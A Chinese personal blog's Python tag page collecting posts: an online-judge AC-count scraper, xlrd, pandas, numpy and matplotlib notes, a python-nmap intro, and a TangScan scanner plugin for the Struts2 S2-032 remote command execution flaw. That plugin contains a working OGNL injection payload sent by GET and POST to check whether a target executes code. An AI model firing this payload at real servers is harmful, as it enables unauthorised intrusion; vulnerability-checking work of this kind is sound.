标签： python

Hduoj用户AC题数统计爬虫

2017年11月9日
python, 爬虫
没有评论

趁着前几天出去比赛的空余时间瞎写完了

一向写python都是现写现查库怎么用

写这个主要是为了班里统计方便，但现在应该用不上了2333

写的挺垃圾，也是第一次搞这个，因为库太好用了感觉自己写的也没啥水平哈哈

其中主要点是判断指定日期的做题AC数

用了下用户实时的提交页面

http://acm.hdu.edu.cn/status.php?first=&pid=&user=aaa&lang=0&status=0

1.爬下直到指定日期最后所有做题情况

2.判断时间是否符合,顺便学习了下datetime

因为日期是从前往后排所以大于当前日期的跳过，直到遇见最后日期跳出循环
需要注意的就是如果指定日期加之前这个用户没有答题过会造成死循环所以判断下当前是否为最后一页因为get参数没有页数所以就判断first是否重复就ok

3.判断是否ac

4.丢到dict

分享一下渣渣代码

# encoding=utf-8
import requests
import re
import xlrd
import xlwt
from bs4 import BeautifulSoup
import datetime


def save_mysql():
    pass


def save_excel(users, Allsolved, pid, sum):
    book = xlwt.Workbook(encoding='utf-8')  # 表格初始化
    sheet1 = book.add_sheet('sheet1', cell_overwrite_ok=True)
    heads = ['ID', u'指定日期累计AC题数' + '(' + start + 'to' + end + ')', u'总共已AC题数', u'指定日期AC题号']
    print u'\n准备将数据存入表格...'
    ii = 0  # 表格初始化用
    for head in heads:
        sheet1.write(0, ii, head)
        ii += 1
    ID_col = 0
    weekid = 3
    week_solved_col = 1
    solved_col = 2
    row = 1
    sheet1.col(week_solved_col).width = 256 * 20
    for user in users:
        sheet1.write(row, ID_col, user)
        row += 1
    row = 1
    for solved in Allsolved:
        sheet1.write(row, solved_col, solved)
        row += 1
    row = 1
    for wid in pid:
        sheet1.write(row, weekid, wid)
        row += 1
    row = 1
    for wsum in sum:
        sheet1.write(row, week_solved_col, wsum)
        row += 1
    book.save('Acm' + start + 'to' + end + '.xls')
    print u'\n录入成功！'


def run(users):
    All_Solved = []
    ID = []
    SUM = []
    for user in users:
        ########目前已做总题数
        userpages = requests.get("http://acm.hdu.edu.cn/userstatus.php?user=" + user)
        n = re.compile(r'>(.*)</h1>')
        s = re.compile(r'Solved</td><td align=center>([0-9]+)<')
        name = n.search(userpages.text)
        solved = s.search(userpages.text)

        print name.group(1) + " " + solved.group(1)
        All_Solved.append(solved.group(1))
        ########每日统计
        sum = 0
        print user
        first = '99999999'
        run_forever = True
        repid = ['|']  # 防止重复+统计题号
        while run_forever:
            req = requests.get(
                "http://acm.hdu.edu.cn/status.php?first=" + first + "&pid=&user=" + user + "&lang=0&status=0")
            soup = BeautifulSoup(req.text, 'lxml')
            tables = soup.findAll('table')
            tab = tables[3]
            old = []
            new = []
            dict = {'Runid': '123', 'Subtime': '2017', 'Status': 'ac', 'Id': '123'}
            for tr in tab.findAll('tr')[1:]:
                i = 1
                for td in tr.findAll('td')[:4]:
                    if i == 1:
                        dict['Runid'] = td.getText()
                        Runid = td.getText()
                    elif i == 2:
                        dict['Subtime'] = td.getText()
                    elif i == 3:
                        dict['Status'] = td.getText()
                    else:
                        dict['Id'] = td.getText()
                    i += 1
                old.append(dict.copy())
            if first == str(int(Runid) - 1):  # 防止当这个用户这个时间段没做过题的情况(死循环)
                break
            for AoW in old:
                time = datetime.datetime.strptime(AoW['Subtime'][0:-9], '%Y-%m-%d')
                if time <= d2 and time >= d1:
                    ac = 'Accepted'
                    # print AoW
                    if AoW['Status'] == ac:
                        for cfid in repid:
                            if AoW['Id'] != cfid:
                                f = 1
                                # T.append(AoW['Id'])
                            else:  # 如果重复 退出循环
                                f = 0
                                break
                        if f == 1:
                            repid.append(AoW['Id'])  # 防止重复
                            repid.append(' ')
                            new.append(AoW)
                elif time < d1:
                    run_forever = False
                    # break
                else:
                    pass

            ####
            for tt in new:
                print tt
            sum += len(new)

            first = str(int(Runid) - 1)  # 最后一个

        print '------'
        print sum
        print '------'
        ID.append(repid)
        SUM.append(sum)
        # print ID
        # print SUM
        # print SUM
    save_excel(users, All_Solved, ID, SUM)


def main():
    # 读入userID
    book = xlrd.open_workbook('./acmid.xlsx')
    sheet = book.sheet_by_name('sheet1')
    users = sheet.col_values(0)
    print users
    run(users)


if __name__ == '__main__':
    print '日期输入格式：年-月-日'
    start = raw_input("起始日期：")
    end = raw_input("终止日期：")
    d1 = datetime.datetime.strptime(start, '%Y-%m-%d')
    d2 = datetime.datetime.strptime(end, '%Y-%m-%d')
    main()

xlrd基本操作并配合matplotlib绘图笔记

2017年8月3日
matplotlib, python, xlrd
没有评论

一个简单的小例子快速了解如何利用xlrd读取excel并借助plt绘图

//之前代码有误，导致上图显示女生数量与男生一样，代码已改正

#encoding=utf-8
import xlrd
import matplotlib.pylab as plt
from pylab import *
def main():
    book=xlrd.open_workbook('./pdtest.xlsx')
    sheet_name = book.sheet_names()[0]#获得指定索引的sheet名字
    print sheet_name
    sheet=book.sheet_by_name('sheet1')
    rows=sheet.nrows#行数
    cols=sheet.ncols#列数
    print rows,cols
    row_data=sheet.row_values(0)
    col_data=sheet.col_values(0)
    print row_data,col_data
    cell=sheet.cell_value(1,2)
    print cell
    for i in range(rows):#每行数据
        print sheet.row_values(i)
    col1=sheet.col_values(1)[1:]#去掉列名称 打印指定列
    print col1
    k = 0
    for i in col1:
        print int(i)
        if int(i)==int('2'):
            k+=1
    print k
    book1=xlrd.open_workbook('./reg.xls')
    #sheet_name1=book1.sheet_names()[0]
    #print sheet_name1
    list=book1.sheets()[0]
    nrows=list.nrows
    print nrows
    print "------------------"
    col2=list.col_values(4)[1:]
    g = 0
    b = 0
    for i in col2:
        if i == u"\u5973":
            g=g+1

        if i == u"\u7537":
            b+=1

    print g,b

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    plt.figure(1)
    plt.bar(left=0,height=b,width=0.35,align="center",color="b",label="boy")
    plt.bar(left=0.5,height=g,width=0.35,align="center",color="y",label="girl")
    plt.title(u"2017太原市中考性别分布[柱状图]")
    plt.xlabel(u"性别")
    plt.ylabel(u"人数")
    plt.xticks((0, 0.5), (u"男", u"女"))
    plt.text(0, b+0.05, "%d" % b, ha="center", va="bottom")
    plt.text(0.5, g+0.05, "%d" % g, ha="center", va="bottom")
    #图中有误，之前把代码里面的参数g写成了b
    #plt.legend(loc="upper left")
    plt.show()


if __name__ == '__main__':
    main()

output:

sheet1
5 3
[u'', u'man', u'woman'] [u'', u'a', u'b', u'c', u'd']
1.0
[u'', u'man', u'woman']
[u'a', 2.0, 1.0]
[u'b', 6.0, 3.0]
[u'c', 2.0, 4.0]
[u'd', 1.0, 6.0]
[2.0, 6.0, 2.0, 1.0]
2
6
2
1
2
41609
------------------
20445 21163

Pandas基本操作笔记

2017年8月1日
pandas, python
没有评论

Python Data Analysis Library 或 pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。Pandas 纳入了大量库和一些标准的数据模型，提供了高效地操作大型数据集所需的工具。pandas提供了大量能使我们快速便捷地处理数据的函数和方法。你很快就会发现，它是使Python成为强大而高效的数据分析环境的重要因素之一。

#encoding=utf-8
import numpy as np
import pandas as pd
def main():
    #生成表格
    dates=pd.date_range("20170801",periods=8)
    df=pd.DataFrame(np.random.randn(8,5),index=dates,columns=list("ABCDE"))#生成框架
    print df
    dff=pd.DataFrame({"A":np.random.randint(1,10,8),"B":pd.date_range("20170707",periods=8)})
    print dff

    #基本操作
    print df.head(3)#打印前三行
    print df.tail(3)#打印后三行
    print df.index
    print df.values
    print df.T#转置
    print df.sort_values("C")#排序C列 升序
    print df.sort_index(axis=1,ascending=False)#用属性值排序 降序
    print df.describe()#数据的相关信息
    print df["A"]#切片
    print df[:3]
    print df["20170801":"20170806"]
    print df.loc[dates[0]]
    print df.loc["20170802":"20170806",["B","D"]]
    print df.at[dates[0],"C"]
    print df.iloc[1:3,2:4]
    print df.iloc[1,4]#2行第5列
    print df[df.B>0]
    print df[df<0]
    print df[df["E"].isin([1,2])]

    #基本设置
    sl=pd.Series(list(range(10,18)),index=pd.date_range("20170801",periods=8))
    print sl
    df["F"]=sl
    print df
    df.at[dates[0],"A"]=0
    print df
    df.iat[1,4]=666
    df.loc[:,"D"]=np.array([4]*len(df))
    print df
    df2=df.copy()#拷贝
    df2[df2<0]=-df2#负数变为正数
    print df2


if __name__ == '__main__':
    main()

output:

                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
   A          B
0  9 2017-07-07
1  3 2017-07-08
2  3 2017-07-09
3  6 2017-07-10
4  6 2017-07-11
5  4 2017-07-12
6  5 2017-07-13
7  6 2017-07-14
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
DatetimeIndex(['2017-08-01', '2017-08-02', '2017-08-03', '2017-08-04',
               '2017-08-05', '2017-08-06', '2017-08-07', '2017-08-08'],
              dtype='datetime64[ns]', freq='D')
[[ 1.07524464 -0.60505755  0.71275536  2.41815902 -0.02894002]
 [-1.51331977 -0.51708246  1.36323759  0.6185221  -0.45040032]
 [-2.26771071 -2.23593917  2.28891947  2.60836214 -1.1816333 ]
 [-0.27608484 -1.13021474 -0.12282251 -0.54247504 -0.33188383]
 [-0.23136532 -0.48824379  1.75736371 -0.96758439 -1.44857541]
 [ 0.37751303  0.05175454  0.32217176 -0.46223914  0.82356261]
 [ 1.00914409 -0.67055311  0.26280966 -0.86527427 -0.72155023]
 [-0.25735124  0.98478455 -0.29728085 -0.23039814  0.69747694]]
   2017-08-01  2017-08-02  2017-08-03  2017-08-04  2017-08-05  2017-08-06  \
A    1.075245   -1.513320   -2.267711   -0.276085   -0.231365    0.377513   
B   -0.605058   -0.517082   -2.235939   -1.130215   -0.488244    0.051755   
C    0.712755    1.363238    2.288919   -0.122823    1.757364    0.322172   
D    2.418159    0.618522    2.608362   -0.542475   -0.967584   -0.462239   
E   -0.028940   -0.450400   -1.181633   -0.331884   -1.448575    0.823563   

   2017-08-07  2017-08-08  
A    1.009144   -0.257351  
B   -0.670553    0.984785  
C    0.262810   -0.297281  
D   -0.865274   -0.230398  
E   -0.721550    0.697477  
                   A         B         C         D         E
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   E         D         C         B         A
2017-08-01 -0.028940  2.418159  0.712755 -0.605058  1.075245
2017-08-02 -0.450400  0.618522  1.363238 -0.517082 -1.513320
2017-08-03 -1.181633  2.608362  2.288919 -2.235939 -2.267711
2017-08-04 -0.331884 -0.542475 -0.122823 -1.130215 -0.276085
2017-08-05 -1.448575 -0.967584  1.757364 -0.488244 -0.231365
2017-08-06  0.823563 -0.462239  0.322172  0.051755  0.377513
2017-08-07 -0.721550 -0.865274  0.262810 -0.670553  1.009144
2017-08-08  0.697477 -0.230398 -0.297281  0.984785 -0.257351
              A         B         C         D         E
count  8.000000  8.000000  8.000000  8.000000  8.000000
mean  -0.260491 -0.576319  0.785894  0.322134 -0.330243
std    1.158991  0.919133  0.928070  1.436732  0.812523
min   -2.267711 -2.235939 -0.297281 -0.967584 -1.448575
25%   -0.585394 -0.785469  0.166402 -0.623175 -0.836571
50%   -0.244358 -0.561070  0.517464 -0.346319 -0.391142
75%    0.535421 -0.353244  1.461769  1.068431  0.152664
max    1.075245  0.984785  2.288919  2.608362  0.823563
2017-08-01    1.075245
2017-08-02   -1.513320
2017-08-03   -2.267711
2017-08-04   -0.276085
2017-08-05   -0.231365
2017-08-06    0.377513
2017-08-07    1.009144
2017-08-08   -0.257351
Freq: D, Name: A, dtype: float64
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
A    1.075245
B   -0.605058
C    0.712755
D    2.418159
E   -0.028940
Name: 2017-08-01 00:00:00, dtype: float64
                   B         D
2017-08-02 -0.517082  0.618522
2017-08-03 -2.235939  2.608362
2017-08-04 -1.130215 -0.542475
2017-08-05 -0.488244 -0.967584
2017-08-06  0.051755 -0.462239
0.71275536229
                   C         D
2017-08-02  1.363238  0.618522
2017-08-03  2.288919  2.608362
-0.45040032497
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
                   A         B         C         D         E
2017-08-01       NaN -0.605058       NaN       NaN -0.028940
2017-08-02 -1.513320 -0.517082       NaN       NaN -0.450400
2017-08-03 -2.267711 -2.235939       NaN       NaN -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244       NaN -0.967584 -1.448575
2017-08-06       NaN       NaN       NaN -0.462239       NaN
2017-08-07       NaN -0.670553       NaN -0.865274 -0.721550
2017-08-08 -0.257351       NaN -0.297281 -0.230398       NaN
Empty DataFrame
Columns: [A, B, C, D, E]
Index: []
2017-08-01    10
2017-08-02    11
2017-08-03    12
2017-08-04    13
2017-08-05    14
2017-08-06    15
2017-08-07    16
2017-08-08    17
Freq: D, dtype: int64
                   A         B         C         D         E   F
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C         D         E   F
2017-08-01  0.000000 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000 -0.605058  0.712755  4   -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  4  666.000000  11
2017-08-03 -2.267711 -2.235939  2.288919  4   -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823  4   -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364  4   -1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144 -0.670553  0.262810  4   -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281  4    0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000  0.605058  0.712755  4    0.028940  10
2017-08-02  1.513320  0.517082  1.363238  4  666.000000  11
2017-08-03  2.267711  2.235939  2.288919  4    1.181633  12
2017-08-04  0.276085  1.130215  0.122823  4    0.331884  13
2017-08-05  0.231365  0.488244  1.757364  4    1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144  0.670553  0.262810  4    0.721550  16
2017-08-08  0.257351  0.984785  0.297281  4    0.697477  17

Matplotlib基本图形笔记

2017年7月28日
matplotlib, python
没有评论

#encoding=utf-8
import matplotlib.pyplot as plt
import numpy as np



#散点图
fig=plt.figure()#画布
ax=fig.add_subplot(3,2,1)#3行3列第一个
n=128
X=np.random.normal(0,1,n)#生成随机数 正态分布 [numpy.random.normal(loc=0.0, scale=1.0, size=None)]  运行代码中 0->此概率分布的均值（对应着整个分布的中心centre） 1->此概率分布的标准差（对应于分布的宽度，scale越大越矮胖，scale越小，越瘦高）n->输出的shape，默认为None，只输出一个值
Y=np.random.normal(0,1,n)
T=np.arctan2(X,Y)
#print X,Y,T
#plt.axes([0.025,0.025,0.95,0.95])#对画图区域设置 axes([x,y,xs,ys])#其中x代表在X轴的位置，y代表在Y轴的位置，xs代表在X轴上向右延展的范围大小，ys代表在Y轴中向上延展的范围大小
ax.scatter(X,Y,s=75,c=T,alpha=0.5)#绘制散点图size color alpha
plt.xlim(-1.5,1.5),plt.xticks([])#x轴范围 不显示坐标轴刻度
plt.ylim(-1.5,1.5),plt.yticks([])
plt.axis()#显示轴
plt.title("scatter")
plt.xlabel("x")
plt.ylabel("y")


#柱状图
ax=fig.add_subplot(322)
n=10
X=np.arange(n)
Y1=(1-X/float(n+1))
Y2=(1-X/float(n))
#print X,Y1,Y2
ax.bar(X,+Y1,facecolor="#9999FF",edgecolor="white")
ax.bar(X,-Y2,facecolor="#FF2222",edgecolor="white")
for x,y in zip(X,Y1):
    plt.text(x+0.1,+y+0.05,"%.2f"%y,ha="center",va="bottom",rotation="45")#bottom是柱状图相对于所标数字的位置
for x,y in zip(X,Y2):
    plt.text(x+0.1,-y-0.05,"%.2f"%y,ha="center",va="top")
plt.title("bar")
plt.yticks([])
plt.xticks([])



#饼图
ax=fig.add_subplot(323)
n=20
Z=np.ones(n)
Z[-1]*=2
ax.pie(Z,explode=Z*0.05,colors=["%f"%(i/float(n)) for i in range(n)],labels=["%.2f"%(i/float(n)) for i in range(n)])
plt.gca().set_aspect("equal")
plt.xticks([])
plt.yticks([])
plt.title("pie")


#极坐标图
fig.add_subplot(324,polar=True)
n=20
t=np.arange(0.0,2*np.pi,2*np.pi/n)
r=10*np.random.rand(n)
plt.polar(t,r)
plt.title("polar")



#3D
from mpl_toolkits.mplot3d import Axes3D
fig.add_subplot(313,projection="3d")
plt.plot([1,3,5,6,7,9],[4,2,2,1,2,3],[6,8,8,7,8,2],linestyle="-.")
plt.title("3D")



#plt.savefig("./fig.png")#保存
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)#参数图像边界和子图之间的额外边距。边距以字体大小单位规定。
plt.show()

matplotlib基本绘图笔记

2017年7月23日
matplotlib, python
没有评论

matplotlib基本绘图笔记，跟我一起来绘制一个丑陋的三角函数图吧！

#encoding=utf-8

import numpy as np
import matplotlib.pyplot as plt


#基本绘图设置
x=np.linspace(-np.pi,np.pi,256,endpoint=True)#2560个点 是否包含最后一个点
c,s=np.cos(x),np.sin(x)
plt.figure(1)#指定绘制图像1
plt.plot(x,c,color="blue",linewidth=1.5,linestyle="-",label="cos",alpha=0.5)#绘制 (自变量,因变量,颜色，宽度，线形，标签，透明度)
plt.plot(x,s,"r*",label="sin")#"r->红色 *->线形"
plt.title("testruilin cos sin")#标题


#设置轴
ax=plt.gca()#轴的编辑器
ax.spines["right"].set_color("none")#隐藏右面的轴
ax.spines["top"].set_color("none")
ax.spines["left"].set_position(("data",0))#把左面的轴移到数据为0的位置
ax.spines["bottom"].set_position(("data",0))


#轴旁边的数字相关设置
ax.xaxis.set_ticks_position("bottom")#把x轴数字放到x轴下方
ax.yaxis.set_ticks_position("left")
plt.yticks(np.linspace(-1,1,5,endpoint=True))#-1到1标5个点
plt.xlim(-5,5)#范围
for label in ax.get_xticklabels()+ax.get_yticklabels():#字体相关设置
    label.set_fontsize(18)
    label.set_bbox(dict(facecolor="white",edgecolor="black",alpha=0.3))


#其他
plt.grid()#网格线
plt.legend(loc="upper left")#图例位置
#plt.axis([-1,2,0.5,1])#显示范围
plt.fill_between(x,np.abs(x)<0.8,c,c>0.1,color="green",alpha=0.4)#填充效果 横坐标绝对值小于0.8为真即1 从y=1开始往下填充 大于0.8即为0 从0往上填充 这是纵向范围 ，横向范围由c定义范围决定，这里如图是纵坐标为0.1以上的横向距离符合，最后填充符合横向距离与纵向距离的范围的交集


#注释
t=1
plt.plot([t,t],[0,np.cos(t)],"y",linewidth=2.2,linestyle="--")#绘制一条线 两点分别为t,0 t,cos(t)的连线 虚线
plt.annotate("cos(1)",xy=(t,np.cos(t)),xycoords="data",xytext=(+10,+30),textcoords="offset points",arrowprops=dict(arrowstyle="->",connectionstyle="arc3,rad=0.3"))
#注释    基本位置  coords是坐标的意思 xytext=(+10,+30),textcoords="offset points"控制偏移量并设置为相对偏移 arrowprops设置箭头工具 类型 弧度



plt.show()#展示

numpy常用操作笔记

2017年7月21日
numpy, python
没有评论

#encoding=utf-8
import numpy as np

lst=[[1,2,3],[6,7,8]]
print (type(lst))
np_lst=np.array(lst)
print (type(np_lst))
np_lst=np.array(lst,dtype=np.float)
print np_lst
print (np_lst.shape)#几行几列
print (np_lst.ndim)#维度
print (np_lst.dtype)#类型
print (np_lst.itemsize)#所占字节
print (np_lst.size)#大小

print (np.zeros([2,4]))#定义数组
print (np.ones([3,2]))
print (np.random.rand())#随机数
print (np.random.rand(2,4))
print (np.random.randint(1,10,3))#生成1-10随机的三个整数
print (np.random.choice([1,2,3,5,10,100,666]))#选择指定数字
print (np.random.beta(1,10,100))#beta分布

print (np.arange(1,11).reshape([2,-1]))#生成1-10的等差数列并显示为2行5列

list=np.array([[[1,2,3],
               [4,5,6]],
              [[7,8,9],
               [10,11,12]]
              ])
print (list.sum(axis=0))#axis指定一个维度求和 axis越大越深入 =0对最外层求和 1+7 2+8 3+9 4+10 5+11 6+12
print (list.sum(axis=1))#内层求和 1+4 2+5 3+6 7+10 8+11 9+12
print (list.sum(axis=2))#再深入一层 1+2+3 4+5+6 7+8+9 10+11+12
print (list.max(axis=1))#求最大值
print (list.min(axis=2))#求最小值

lst1=np.array([1,2,3])
lst2=np.array([10,11,12])
print (np.concatenate((lst1,lst2),axis=0))#追加到一起
print (np.vstack((lst1,lst2)))#上下追加到一起 两行
print (np.hstack((lst1,lst2)))#合在一起
print (np.split(lst1,3))#分成3组

output:

<type 'list'>
<type 'numpy.ndarray'>
[[ 1.  2.  3.]
 [ 6.  7.  8.]]
(2, 3)
2
float64
8
6
[[ 0.  0.  0.  0.]
 [ 0.  0.  0.  0.]]
[[ 1.  1.]
 [ 1.  1.]
 [ 1.  1.]]
0.0790300286594
[[ 0.40570725  0.40072322  0.75697423  0.45873189]
 [ 0.84684053  0.80063956  0.02231413  0.57768334]]
[4 5 8]
10
[  1.98939407e-02   1.61285413e-02   1.18716706e-02   8.10961771e-02
   1.63533368e-01   1.44668421e-01   5.11693434e-02   6.59941834e-02
   2.23286959e-02   2.15972016e-01   8.63734013e-02   8.06557908e-02
   1.22880147e-01   1.09686347e-02   6.54980124e-02   1.98280109e-03
   4.08960959e-05   4.99724974e-02   4.46814021e-02   1.38706779e-01
   1.24582838e-01   5.32977093e-02   1.01838024e-01   2.46115301e-01
   6.15260218e-03   1.08537025e-01   1.69927681e-02   1.03185373e-01
   2.02785750e-02   4.68360049e-02   2.35353598e-02   1.53166093e-01
   7.08847154e-02   1.43549143e-02   9.55657510e-02   7.62737256e-02
   5.94670869e-03   5.71465328e-03   3.98867568e-02   6.37016822e-02
   9.69537649e-02   3.52414465e-02   5.60588196e-03   1.45640846e-01
   3.06005428e-02   7.66577878e-02   1.98901419e-02   1.04611224e-01
   1.45486287e-02   4.63747783e-03   1.00559794e-01   4.14864166e-02
   6.97617286e-02   1.21598675e-02   5.18675502e-02   2.67329995e-01
   2.71693357e-01   7.61304550e-02   7.19672528e-02   6.30126936e-03
   3.79026503e-02   2.35909430e-01   5.86051618e-02   2.11428839e-01
   1.35133707e-01   6.62907241e-02   1.38296699e-01   2.88886522e-01
   2.40987292e-02   1.76062934e-02   1.90230382e-01   2.09219429e-01
   3.40778112e-02   4.66014797e-02   5.47428038e-03   2.20511410e-02
   3.19067152e-02   2.47324231e-02   3.66452719e-02   2.97249683e-02
   2.26196050e-01   1.59556704e-02   5.66573658e-04   1.44624707e-01
   8.91173413e-02   4.21186597e-02   3.77105859e-03   2.68561111e-01
   1.88337068e-02   1.12529504e-01   1.14325549e-01   6.22131659e-04
   4.74532828e-01   1.57684391e-01   2.60435883e-02   1.53169399e-03
   2.44662204e-02   2.86626061e-02   1.47198619e-01   4.32705246e-02]
[[ 1  2  3  4  5]
 [ 6  7  8  9 10]]
[[ 8 10 12]
 [14 16 18]]
[[ 5  7  9]
 [17 19 21]]
[[ 6 15]
 [24 33]]
[[ 4  5  6]
 [10 11 12]]
[[ 1  4]
 [ 7 10]]
[ 1  2  3 10 11 12]
[[ 1  2  3]
 [10 11 12]]
[ 1  2  3 10 11 12]
[array([1]), array([2]), array([3])]

S2-032 远程命令执行 (POC@Tangscan)

2016年5月6日
POC, python, Tangscan
没有评论

前段时间很火的S2-032 远程命令执行

import re
import string
from StringIO import StringIO
from thirdparty import requests
from modules.exploit import TSExploit
from StringIO import StringIO

class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
            S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def verify(self):
        exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        try:
            r = requests.get(exp_url)
            content = r.content
        except:
            content = ''
        if content.find('88888887') == 0:
            self.result.status = True
            self.result.description = "目标 {url} 存在st2命令执行".format(
            url=self.option.url
        )
        else:
            try:
                headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
                data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"}
                files = {'test': ('1.jpg', StringIO('1'))}
                req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare()
                
                req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj')
                req.headers['Content-Length'] = len(req.body)
                s = requests.Session()
                reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)

                if reponse.content.find('88888887') == 0:
                    self.result.status = True
                    self.result.description = "目标 {url} 存在st2命令执行".format(
                    url=self.option.url
                )
                
                
            except Exception,e:
                print str(e)
    def exploit(self):
        pass

if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

0x01 About

大家都比较熟悉nmap，nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。

今天分享一下python-nmap，是python的一个模块库，使用这个模块可以让python很方便的操作nmap扫描器来工作，它可以帮助管理员完成自动扫描任务和生成报告的工具，它还支持nmap的脚步输出。

python-nmap只提供了nmap中的端口扫描，但输出方式会让人便于信息整理。

前提：使用python-nmap你得先装有nmap该软件

Install from PIP

pip install python-nmap

2345截图20160127212007

继续阅读 nmap from python

Tangscan插件之phpcms V9 /swfupload.swf XSS

2016年1月27日
python, Tangscan
1 条评论

